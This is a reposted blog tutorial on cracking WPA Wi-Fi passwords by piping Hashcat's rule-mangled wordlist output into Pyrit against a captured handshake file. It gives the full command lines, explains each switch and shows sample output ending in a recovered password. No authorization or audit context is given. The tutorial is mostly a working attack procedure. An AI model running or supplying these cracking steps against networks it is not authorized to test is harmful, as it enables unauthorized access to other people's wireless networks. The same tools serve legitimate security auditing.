Using dictionary rules with Pyrit & Hashcat (by d3ad0ne via ob-security.info)

Pyrit is one of the fastest WPA crackers available. The nice thing about it is that it supports opencl, cuda, and has support for CPU’s with SSE2 acceleration. Unfortunately even an extremely fast system can only achieve about 100k keys/sec which makes brute forcing a WPA key pretty pointless for full character set passwords with lengths above five characters. This means the only effective method is to use a dictionary based attack. Personally I’m all for having a lot of dictionary files but there comes a point when even a massive dictionary collection can’t crack those hard to recover WPA keys. This is where Hashcat comes in, with release 0.35 there now includes an option to output mangled words to standard out. Since Pyrit supports wordlist on stdin we can simply pipe hashcat output into Pyrit. To get started we need to create an uncrackable hash file with only a single hash, this is so Hashcat constantly outputs the plaintext.

# echo ffffffffffffffff > nofind.hash

We set the Hashcat mode to –m 200 (mysql) because it is one of the fastest modes and can use a smaller number of threads. As an example you can see what happens when you don’t pipe Hashcat’s output into Pyrit.

# ./hashcat-cli64.bin -m 200 -r rules/best64.rule --debug-mode=3 nofind.hash dictionary.dic
Ctrl+C to stop

Something to consider is for every 1 rule that you use with Hashcat it will increase your dictionary by 1 times. So given a dictionary that is 1000 words and using 64 rules will expand your dictionary to 64,000 words. So if you calculate that it takes 20 minutes for your dictionary to complete normally then with 64 rules it would take nearly 21 hours. Hashcat 0.35 includes a rule file called best64.rule located in the rules folder. Since best64.rule is sorted by the top finding rules you could make a new rule file with less rules.

# head –n 10 best64.rule > best10.rule

Now to add it all together..

# ./hashcat-cli64.bin -m 200 –n 2 -r rules/best10.rule --debug-mode=3 nofind.hash dictionary.dic | pyrit –r wpa_test.cap –i – attack_passthrough

If you’ve done everything correctly you should see something like…

Pyrit 0.3.1-dev (svn r283) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file ‘ /wpa_test.cap’ (1/1)…
Parsed 5 packets (5 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:0d:ea:d0:01:00 (‘test’) automatically.
Tried 3840192 PMKs so far; 106871 PMKs per second.

Hopefully if all goes well you will see this –

The password is 'Passw0rd'.

For the switches used in Hashcat v0.35 -m 200 sets it to mode mysql, -n 2 sets it to use only 2 threads instead of 8 which is the default. This way there are more threads devoted to cracking wpa keys. -r sets the rule file, and finally –debug-mode=3 is what actually outputs the mangled words to stdout.

Hashcat can be downloaded at hashcat.net

 

Original article: http://ob-security.info/?p=18

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s